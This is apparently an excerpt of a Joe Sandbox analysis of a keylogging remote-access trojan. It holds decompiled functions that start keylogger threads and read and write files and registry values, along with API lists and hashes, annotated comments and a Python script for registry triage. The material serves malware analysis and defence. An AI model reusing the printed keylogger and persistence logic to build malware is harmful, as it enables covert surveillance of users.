                                                                      0x00408efd
                                                                      0x00408f01
                                                                      0x00408f03
                                                                      0x00408f08
                                                                      0x00408f0c
                                                                      0x00408f12
                                                                      0x0040903a
                                                                      0x00409055
                                                                      0x00409061
                                                                      0x00409061
                                                                      0x00409055
                                                                      0x00409067
                                                                      0x0040907a

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00408E6A
                                                                        • Part of subcall function 00408D9F: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408E77), ref: 00408DD5
                                                                        • Part of subcall function 00408D9F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408E77), ref: 00408DE4
                                                                        • Part of subcall function 00408D9F: Sleep.KERNEL32(00002710,?,?,?,00408E77), ref: 00408E11
                                                                        • Part of subcall function 00408D9F: CloseHandle.KERNEL32(00000000,?,?,?,00408E77), ref: 00408E18
                                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00408EA6
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 00408EB7
                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 00408ECE
                                                                      • PathFileExistsW.KERNELBASE(00000000,00000000,00000000,00000012), ref: 00408F48
                                                                        • Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000006,00000013,004610EC), ref: 00409061
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                      • String ID:
                                                                      • API String ID: 3795512280-0
                                                                      • Opcode ID: 9b9c6716843d478f59f79ffc508c013b3a1489281b0fe0909512c3ecac0a7143
                                                                      • Instruction ID: 5c635a6cfe2eadd611e1a665c3ef29f93fcc060bfe6103269511a7b738c47b9f
                                                                      • Opcode Fuzzy Hash: 9b9c6716843d478f59f79ffc508c013b3a1489281b0fe0909512c3ecac0a7143
                                                                      • Instruction Fuzzy Hash: A9516C716042415ACB04BB72CD66ABF779A9B90349F00093FB542B72E3EF3D9D05869A
                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 85%
                                                                      			E00408935(void* __ecx, char* __edx, char _a4) {
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				void* _v56;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t21;
                                                                      				void* _t39;
                                                                      				void* _t41;
                                                                      				signed int _t42;
                                                                      				void* _t44;
                                                                      
                                                                      				_t33 = __edx;
                                                                      				_t44 = (_t42 & 0xfffffff8) - 0x1c;
                                                                      				_push(_t21);
                                                                      				_t39 = __ecx;
                                                                      				 *((char*)(__ecx + 0x49)) = 1;
                                                                      				E00409F8F(__ecx + 0x60,  &_a4);
                                                                      				_t48 =  *0x46c9c4 - 0x32;
                                                                      				_t35 = "Offline Keylogger Started";
                                                                      				if( *0x46c9c4 != 0x32) {
                                                                      					E00402053(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
                                                                      					_t44 = _t44 - 0x18;
                                                                      					_t33 =  &_v32;
                                                                      					E00418385(_t44,  &_v32);
                                                                      					E004097F2(_t21, _t39, _t48);
                                                                      					E00401F98();
                                                                      				}
                                                                      				_t45 = _t44 - 0x18;
                                                                      				E00402053(_t21, _t44 - 0x18, _t33, _t41, _t35);
                                                                      				E00402053(_t21, _t45 - 0x18, _t33, _t41, "i");
                                                                      				E00417D02(_t21, _t35);
                                                                      				CreateThread(0, 0, E00408A37, _t39, 0, 0); // executed
                                                                      				if( *_t39 == 0) {
                                                                      					CreateThread(0, 0, E00408A21, _t39, 0, 0); // executed
                                                                      				}
                                                                      				CreateThread(0, 0, E00408A43, _t39, 0, 0); // executed
                                                                      				return E00401EC9();
                                                                      			}

                                                                      Instruction address column for E00408935 (one address per C-code line; first entry 0x00408935, last entry 0x004089e9)

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,00408A37,?,00000000,00000000), ref: 004089BD
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00008A21,?,00000000,00000000), ref: 004089CD
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00008A43,?,00000000,00000000), ref: 004089D9
                                                                        • Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
                                                                        • Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread$LocalTimewsprintf
                                                                      • String ID: Offline Keylogger Started$Cv
                                                                      • API String ID: 465354869-172359471
                                                                      • Opcode ID: 74249c497cd070250b76d4e8322ec341e6c4761e3e3defb514e937134a00d100
                                                                      • Instruction ID: a66275cd029605e2d6c4c23146f9b35dac49eccb0e3f577f27fac9660554f43d
                                                                      • Opcode Fuzzy Hash: 74249c497cd070250b76d4e8322ec341e6c4761e3e3defb514e937134a00d100
                                                                      • Instruction Fuzzy Hash: 7B1198E12002183ED210BB669D86DBF7A5CDA8139CB44057FF881221C3DEB85D05C6FA
                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph: basic blocks 418911-4189a4 with calls to CreateFileW, SetFilePointer, CloseHandle, WriteFile and FindCloseChangeNotification (executed / not-executed colouring of the graph image not captured)
                                                                      C-Code - Quality: 100%
                                                                      			E00418911(long __edx, WCHAR* _a4, long _a8) {
                                                                      				long _v4;
                                                                      				long _t8;
                                                                      				long _t9;
                                                                      				void* _t10;
                                                                      				int _t12;
                                                                      				struct _OVERLAPPED* _t19;
                                                                      				void* _t20;
                                                                      				long _t21;
                                                                      				long _t23;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      
                                                                      				_t19 = 0;
                                                                      				_t25 = _t20;
                                                                      				_t23 = __edx;
                                                                      				_t8 = _a8;
                                                                      				if(_t8 == 0) {
                                                                      					_t9 = 0x40000000;
                                                                      					_t21 = 2;
                                                                      				} else {
                                                                      					if(_t8 != 1) {
                                                                      						_t9 = _a8;
                                                                      						_t21 = _a8;
                                                                      					} else {
                                                                      						_t9 = 4;
                                                                      						_t21 = _t9;
                                                                      					}
                                                                      				}
                                                                      				_t10 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19); // executed
                                                                      				_t24 = _t10;
                                                                      				if(_t24 != 0xffffffff) {
                                                                      					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
                                                                      						_t12 = WriteFile(_t24, _t25, _t23,  &_v4, _t19); // executed
                                                                      						if(_t12 != 0) {
                                                                      							_t19 = 1;
                                                                      						}
                                                                      						FindCloseChangeNotification(_t24); // executed
                                                                      						return _t19;
                                                                      					} else {
                                                                      						CloseHandle(_t24);
                                                                      						goto L6;
                                                                      					}
                                                                      				} else {
                                                                      					L6:
                                                                      					return 0;
                                                                      				}
                                                                      			}

                                                                      Instruction address column for E00418911 (one address per C-code line; first entry 0x00418919, last entry 0x0041895d)

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,00418A34,00000000,00000000,00000000), ref: 00418950
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041896D
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418979
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041898A
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00418997
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                      • String ID:
                                                                      • API String ID: 1087594267-0
                                                                      • Opcode ID: 9f4340a4c9e5937eada5f5b875228784ce05a6c6d5cecaa29566e016291d535e
                                                                      • Instruction ID: 80e4ba22bf89f8ee18f13056a795aaacedb7bc5eca07055e70640f5838e5d001
                                                                      • Opcode Fuzzy Hash: 9f4340a4c9e5937eada5f5b875228784ce05a6c6d5cecaa29566e016291d535e
                                                                      • Instruction Fuzzy Hash: 8F1108F12252157FE6104A649C88EFB739CEB823B9F10062EF651D62D0CA25CC81863B
                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph: basic blocks 410ce2-410d42 with calls to RegCreateKeyA, RegSetValueExA and RegCloseKey and subcalls to 40243c, 401f6b and 401f98 (executed / not-executed colouring of the graph image not captured)
                                                                      C-Code - Quality: 77%
                                                                      			E00410CE2(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
                                                                      				void* _v8;
                                                                      				long _t12;
                                                                      				int _t15;
                                                                      				long _t17;
                                                                      				signed int _t19;
                                                                      				signed int _t20;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(_t19);
                                                                      				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                                                                      				if(_t12 != 0) {
                                                                      					_t20 = 0;
                                                                      				} else {
                                                                      					_t15 = E0040243C();
                                                                      					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F6B( &_a8), _t15); // executed
                                                                      					RegCloseKey(_v8); // executed
                                                                      					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
                                                                      				}
                                                                      				E00401F98();
                                                                      				return _t20;
                                                                      			}

                                                                      Instruction address column for E00410CE2 (one address per C-code line; first entry 0x00410ce5, last entry 0x00410d42)

                                                                      APIs
                                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410CF1
                                                                      • RegSetValueExA.KERNELBASE(?,00462000,00000000,?,00000000,00000000,0046E5A0,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D19
                                                                      • RegCloseKey.KERNELBASE(?,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseCreateValue
                                                                      • String ID: pth_unenc
                                                                      • API String ID: 1818849710-4028850238
                                                                      • Opcode ID: 21ad348f6b2cdecdc11739af5a3116a30b9da9c80141f51c2204706795f3566d
                                                                      • Instruction ID: e5fecbdd269f249bfb6c5e539c51175ac4a9768262394a6b8c1c59c519a6a8fd
                                                                      • Opcode Fuzzy Hash: 21ad348f6b2cdecdc11739af5a3116a30b9da9c80141f51c2204706795f3566d
                                                                      • Instruction Fuzzy Hash: 00F0F072400108BFCB00AFA0EC05EEF372CEF04755F20812ABD05AA0A2EB35AE40DB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Reads a 4-byte (REG_DWORD-sized) value from HKEY_CURRENT_USER\<__edx>, value name _a4, into the buffer _a8.
                                                                      			// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ. Returns 1 only if RegQueryValueExA succeeded.
                                                                      			E00410AC0(char* __edx, char* _a4, char* _a8) {
                                                                      				void* _v8;   // opened key handle
                                                                      				int _v12;    // cbData: 4 bytes in, bytes written out
                                                                      				int _v16;    // receives the value type
                                                                      				int _t12;
                                                                      				long _t14;
                                                                      				long _t18;
                                                                      				signed int _t19;
                                                                      
                                                                      				_t12 = 4;
                                                                      				_v12 = _t12;
                                                                      				_v16 = _t12;
                                                                      				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                                                                      				if(_t14 != 0) {
                                                                      					return 0; // key absent or inaccessible
                                                                      				}
                                                                      				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
                                                                      				_t19 = RegCloseKey(_v8); // executed
                                                                      				// Decompiler rendering of "setz al": the low byte is 1 when the query returned ERROR_SUCCESS.
                                                                      				return _t19 & 0xffffff00 | _t18 == 0x00000000;
                                                                      			}

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410AE0
                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046E5A0), ref: 00410AFE
                                                                      • RegCloseKey.KERNELBASE(?), ref: 00410B09
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: pth_unenc
                                                                      • API String ID: 3677997916-4028850238
                                                                      • Opcode ID: 7053b8e8240af954fd7df57cdafcc7f75240cb4fb625a4bc86cd69d0a0dfcf9e
                                                                      • Instruction ID: f4496cc878273702dfdc3da5aaa854e1b50d141723799327ce4bada9fc694977
                                                                      • Opcode Fuzzy Hash: 7053b8e8240af954fd7df57cdafcc7f75240cb4fb625a4bc86cd69d0a0dfcf9e
                                                                      • Instruction Fuzzy Hash: 48F01D7690420CFFDF109FE0AC05FEE7BBCEB44B15F2080A5BA05EA191D2719A949B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Reads a whole file into the buffer object at __edx (E0040240E sizes it, E00401F6B returns its data pointer).
                                                                      			// _t13 is the file name; the decompiler did not recover which register carries it into this function.
                                                                      			// CreateFileW flags: 0x80000000 = GENERIC_READ, 3 = FILE_SHARE_READ|FILE_SHARE_WRITE, 3 = OPEN_EXISTING, 0x80 = FILE_ATTRIBUTE_NORMAL.
                                                                      			// FindCloseChangeNotification shares its address with CloseHandle in kernelbase.dll, so the final call is the CloseHandle that releases the file handle.
                                                                      			E004189A5(void* __edx) {
                                                                      				long _v12;   // bytes actually read
                                                                      				void* __ebx;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t3;
                                                                      				int _t8;
                                                                      				struct _OVERLAPPED* _t12;
                                                                      				WCHAR* _t13;
                                                                      				void* _t17;  // file handle
                                                                      				long _t19;   // file size
                                                                      				void* _t21;
                                                                      
                                                                      				_t12 = 0;
                                                                      				_t21 = __edx;
                                                                      				_t3 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                      				_t17 = _t3;
                                                                      				if(_t17 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                      					_t19 = GetFileSize(_t17, 0);
                                                                      					E0040240E(0, _t21, _t17, _t21, _t19, 0); // grow the buffer to the file size
                                                                      					_v12 = 0;
                                                                      					_t8 = ReadFile(_t17, E00401F6B(_t21), _t19,  &_v12, 0); // executed
                                                                      					if(_t8 != 0) {
                                                                      						_t12 = 1; // success flag
                                                                      					}
                                                                      					FindCloseChangeNotification(_t17); // executed
                                                                      					return _t12;
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004189D2
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004189F7
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00418A05
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                                                      • String ID:
                                                                      • API String ID: 2135649906-0
                                                                      • Opcode ID: 87118bf7b8f2c9ea4181c262c12cf33c2244f8cf286b6956f58745756308a35a
                                                                      • Instruction ID: e6ae1e87f009a8b267ac87045a22280881a06ba37f39a171122354ec6aca05bc
                                                                      • Opcode Fuzzy Hash: 87118bf7b8f2c9ea4181c262c12cf33c2244f8cf286b6956f58745756308a35a
                                                                      • Instruction Fuzzy Hash: 24F0C2B12023187FE6101B21AC84EBF366CEBC67E9F00023EF801A22C1CB658C45417A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Statically linked CRT (LIBCMT) helper, not malware-specific logic: duplicates the process environment block.
                                                                      			// E0044B094 finds the terminating double NUL, the length is doubled to a byte count, E004421F7 allocates,
                                                                      			// E00433220 copies, E004427C2 is _free (called with 0, a no-op), and the original block is released.
                                                                      			E0044B14E(void* __ecx) {
                                                                      				void* _t6;
                                                                      				int _t12;    // size of the block in bytes
                                                                      				void* _t14;
                                                                      				void* _t18;  // heap copy returned to the caller (0 on failure)
                                                                      				WCHAR* _t19; // environment block from the OS
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t19 = GetEnvironmentStringsW();
                                                                      				if(_t19 != 0) {
                                                                      					_t12 = (E0044B094(_t19) - _t19 >> 1) + (E0044B094(_t19) - _t19 >> 1);
                                                                      					_t6 = E004421F7(_t14, (E0044B094(_t19) - _t19 >> 1) + (E0044B094(_t19) - _t19 >> 1)); // executed
                                                                      					_t18 = _t6;
                                                                      					if(_t18 != 0) {
                                                                      						E00433220(_t18, _t19, _t12);
                                                                      					}
                                                                      					E004427C2(0);
                                                                      					FreeEnvironmentStringsW(_t19);
                                                                      				} else {
                                                                      					_t18 = 0;
                                                                      				}
                                                                      				return _t18;
                                                                      			}

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044B152
                                                                      • _free.LIBCMT ref: 0044B18B
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044B192
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free_free
                                                                      • String ID:
                                                                      • API String ID: 2716640707-0
                                                                      • Opcode ID: 4f46137869c3cae6b4285890766a5a5dae1d4d0c0190a0bdc3000a0ecb47cd6c
                                                                      • Instruction ID: 38596851c3e658fe0a0f91bf76ce37377600a257cca0034f253913d0fcd42bdf
                                                                      • Opcode Fuzzy Hash: 4f46137869c3cae6b4285890766a5a5dae1d4d0c0190a0bdc3000a0ecb47cd6c
                                                                      • Instruction Fuzzy Hash: B8E09B37104A106BF321263B7C59D6F2A19DFD17FAB55012BF54886142EF1CCD4640F9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			// Reads a string value (up to 0x400 bytes) from key _a4 under hive __edx (0x80000002 = HKEY_LOCAL_MACHINE in the
                                                                      			// recorded call), value name _a8, into the string object at __ecx via E00402053. If the key cannot be opened the
                                                                      			// empty string at 0x461084 is assigned instead. The RegQueryValueExA result is never checked, so a missing value
                                                                      			// copies the uninitialized stack buffer into the string.
                                                                      			E00410B1D(void* __ecx, void* __edx, char* _a4, char* _a8) {
                                                                      				void* _v8;       // opened key handle
                                                                      				int _v12;        // cbData, 0x400
                                                                      				char _v1036;     // 1024-byte stack buffer for the value data
                                                                      				void* __ebp;
                                                                      				long _t11;
                                                                      				void* _t19;
                                                                      				void* _t22;
                                                                      				void* _t23;      // the string object (this)
                                                                      				void* _t24;
                                                                      
                                                                      				_t22 = __edx;
                                                                      				_v12 = 0x400;
                                                                      				_t23 = __ecx;
                                                                      				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed, 0x20019 = KEY_READ
                                                                      				if(_t11 != 0) {
                                                                      					_push(0x461084); // empty string constant
                                                                      				} else {
                                                                      					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed, return value ignored
                                                                      					RegCloseKey(_v8);
                                                                      					_push( &_v1036);
                                                                      				}
                                                                      				E00402053(_t19, _t23, _t22, _t24); // string assign from the pushed char*
                                                                      				return _t23;
                                                                      			}

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410B3F
                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410B5E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410B67
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 082bb0e7f3251a25b6249291ddec227c05369effdcea8086b3da4da2b9e09f8e
                                                                      • Instruction ID: 4d432c2b4f5be1bb2a93fa507f3f7109f49a99b8228294946a1cd537aea9961c
                                                                      • Opcode Fuzzy Hash: 082bb0e7f3251a25b6249291ddec227c05369effdcea8086b3da4da2b9e09f8e
                                                                      • Instruction Fuzzy Hash: 51F0C27560421CBBDF109B90DC45FDE777CEB04B09F2040A6BB05B61D0D6B0AA819B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
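The three registry routines above (the RegCreateKeyA/RegSetValueExA writer whose API list mentions pth_unenc and "3.5.1 Pro", E00410AC0 and E00410B1D) are easier to triage from the report's own "APIs" lines than from the pseudo-C, once the raw handle and access-mask constants are decoded. The script below is an added example, not Joe Sandbox or Remcos code: it parses the "• Api.Module(args), ref: addr" lines exactly as printed in this section (the sample list is copied from them), decodes the predefined hive handles (0x80000001 = HKEY_CURRENT_USER, 0x80000002 = HKEY_LOCAL_MACHINE) and KEY_* masks, and collects the literal strings Joe recovered from the stack. The `RegCall` dataclass and function names are this example's own; the constants are from winreg.h/winnt.h.

```python
"""Decode Joe Sandbox 'APIs' listing lines into registry triage rows.

Added example (not Joe Sandbox or Remcos code). Parses lines of the form
"• Api.Module(arg,arg,...), ref: addr" and decodes hive handles and access masks.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the registry API lines quoted in this section of the report.
SAMPLE_API_LINES = [
    "• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410CF1",
    "• RegSetValueExA.KERNELBASE(?,00462000,00000000,?,00000000,00000000,0046E5A0,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D19",
    "• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410AE0",
    "• RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410B3F",
    "• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410B5E",
    "• RegCloseKey.KERNELBASE(?), ref: 00410B09",
]

API_LINE = re.compile(r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")

# Predefined root key handles (winreg.h).
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
    0x80000006: "HKEY_DYN_DATA",
}

# Composite masks are reported by name; anything else is decoded bit by bit.
NAMED_MASKS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
KEY_BITS = [
    (0x00001, "KEY_QUERY_VALUE"), (0x00002, "KEY_SET_VALUE"),
    (0x00004, "KEY_CREATE_SUB_KEY"), (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00010, "KEY_NOTIFY"), (0x00020, "KEY_CREATE_LINK"),
    (0x00100, "KEY_WOW64_64KEY"), (0x00200, "KEY_WOW64_32KEY"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"),
    (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"),
]


@dataclass
class RegCall:
    api: str
    module: str
    ref: int                         # call-site address from the "ref:" field
    hive: Optional[str] = None       # decoded root handle when a predefined one was passed
    access: Optional[str] = None     # decoded samDesired for RegOpenKeyEx*
    cb_data: Optional[int] = None    # buffer size handed to RegQueryValueEx*
    strings: List[str] = field(default_factory=list)  # literal strings Joe recovered from the stack


def decode_access(mask: int) -> str:
    if mask in NAMED_MASKS:
        return NAMED_MASKS[mask]
    names = [name for bit, name in KEY_BITS if mask & bit]
    rest = mask & ~sum(bit for bit, _ in KEY_BITS)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def parse_arg(tok: str):
    """'?' is an unrecovered stack slot, 8 hex digits is a DWORD, anything else is a literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX32.fullmatch(tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[RegCall]:
    m = API_LINE.match(line)
    if not m or not m["api"].startswith("Reg"):
        return None  # not a registry call (or not an API line at all)
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    call = RegCall(api=m["api"], module=m["module"], ref=int(m["ref"], 16))
    call.strings = [a for a in args if isinstance(a, str)]
    if call.api.startswith(("RegOpenKey", "RegCreateKey")) and args and isinstance(args[0], int):
        call.hive = HIVES.get(args[0])          # None when the hive is a handle from an earlier open
    if call.api.startswith("RegOpenKeyEx") and len(args) > 3 and isinstance(args[3], int):
        call.access = decode_access(args[3])    # samDesired is the fourth argument
    if call.api.startswith("RegQueryValueEx") and len(args) > 5 and isinstance(args[5], int):
        call.cb_data = args[5]                  # lpcbData is the sixth argument
    return call


def triage(lines) -> List[RegCall]:
    return [c for c in (parse_api_line(l) for l in lines) if c]


def hives_touched(calls) -> List[str]:
    return sorted({c.hive for c in calls if c.hive})


if __name__ == "__main__":
    for c in triage(SAMPLE_API_LINES):
        print(f"{c.ref:08X} {c.api:<16} hive={c.hive} access={c.access} cb={c.cb_data} strings={c.strings}")
```

Strings such as pth_unenc and "3.5.1 Pro" appear in the RegSetValueExA line because Joe prints stack slots beyond the formal arguments, so they are neighbours of the call rather than proven parameters; the script keeps them as leads, not as the value name.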

                                                                      C-Code - Quality: 100%
                                                                      			// Converts the Win32 error code in __edx into its system message text and stores it in the string object at __ecx.
                                                                      			// 0x1100 = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, 0x400 = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT).
                                                                      			// The API list shows a caller using it for "Keylogger initialization failure: error ".
                                                                      			E0041925A(void* __ecx, long __edx) {
                                                                      				char _v8;    // receives the LocalAlloc'd message buffer
                                                                      				char _v32;   // temporary string object
                                                                      				void* __ebp;
                                                                      				void* __eflags;
                                                                      				long _t10;
                                                                      				void* _t18;
                                                                      				long _t26;
                                                                      				void* _t27;  // destination string object (this)
                                                                      				void* _t29;
                                                                      
                                                                      				_t26 = __edx;
                                                                      				_t27 = __ecx;
                                                                      				E0040209F(_t18,  &_v32);
                                                                      				_t10 = FormatMessageA(0x1100, 0, __edx, 0x400,  &_v8, 0, 0); // executed
                                                                      				if(_t10 != 0) {
                                                                      					L00405A7D(_t18,  &_v32, _t26, _v8); // copy the message text
                                                                      					LocalFree(_v8); // buffer allocated by FormatMessageA
                                                                      					E00402015(_t18, _t27, _t29, __eflags,  &_v32);
                                                                      				} else {
                                                                      					E00402053(_t18, _t27, _t26, _t29, 0x461084); // empty string constant
                                                                      				}
                                                                      				E00401F98();
                                                                      				return _t27;
                                                                      			}

                                                                      APIs
                                                                      • FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,00404A17,00000000,00000000,0046E278,0046E278), ref: 00419282
                                                                      • LocalFree.KERNEL32(00404A17,00404A17,?,?,?,?,?,?,?,00404A17,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8), ref: 004192A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FormatFreeLocalMessage
                                                                      • String ID:
                                                                      • API String ID: 1427518018-0
